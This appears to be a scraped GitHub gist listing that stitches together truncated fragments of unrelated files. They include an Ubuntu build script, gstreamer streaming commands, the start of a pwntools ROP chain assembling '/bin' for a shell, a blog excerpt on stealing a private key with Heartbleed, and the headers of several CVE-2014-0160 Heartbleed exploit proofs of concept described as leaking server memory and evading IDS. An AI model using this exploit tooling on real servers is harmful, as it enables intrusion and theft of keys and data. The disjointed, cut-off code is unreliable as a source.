#!/bin/bash
sudo apt-get update;
sudo apt-get upgrade;
sudo apt-get install autoconf automake gcc make git;
sudo apt-get install libffi-dev libncurses5-dev openssl patch python-dev python-virtualenv libreadline6-dev libsqlite3-dev libbz2-dev;
sudo apt-get install libsqlite3-dev libbz2-dev libdb5.3-dev tk8.6-dev libncurses5-dev libssl-dev libgdbm-dev;
wget https://launchpad.net/ubuntu/+archive/primary/+files/python2.7_2.7.11.orig.tar.gz;
@esrever10
esrever10 / gs.sh
Last active February 7, 2024 10:26
gstreamer send and receive h264 rtp stream
# linux send h264 rtp stream:
gst-launch-1.0 -v ximagesrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000
# Macos send h264 rtp stream:
gst-launch-1.0 -v avfvideosrc capture-screen=true ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000
# receive h264 rtp stream:
gst-launch-1.0 -v udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! autovideosink
from pwn import *
from struct import pack
context(arch='i386', os='linux', log_level='debug')
p = ''
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supports all versions of TLS and has STARTTLS support for SMTP, POP3, IMAP, FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the
10th to get it (ok, looks like I was the 7th.) But I'm happy that I was able to prove to myself
that I too could do it.
First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially
believed that it would be highly improbable under normal conditions to obtain the private key
through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's
challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to
extract private keys. So I wanted to see first-hand if it was possible or not.
@esrever10
esrever10 / hb4.c
Created April 11, 2014 12:23
TLS+SMTPS
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* written to a file to annoy IDS/forensics.
*
* https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c
* https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py
@esrever10
esrever10 / hb3.py
Created April 11, 2014 12:22
SMTPS, etc.
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols
# The authors disclaim copyright to this source code.
import sys
import struct
@esrever10
esrever10 / hb2.c
Created April 11, 2014 12:21
TLS layer
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* written to a file to annoy IDS/forensics. The exploit can set
* the heartbeat payload length arbitrarily or use two preset
* values for 0x00 and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
#include <cstdio>
#include <vector>
#include <bitset>
#include <climits>
#include <iostream>
using namespace std;
#define MAX 15
vector<bitset<MAX> > vec;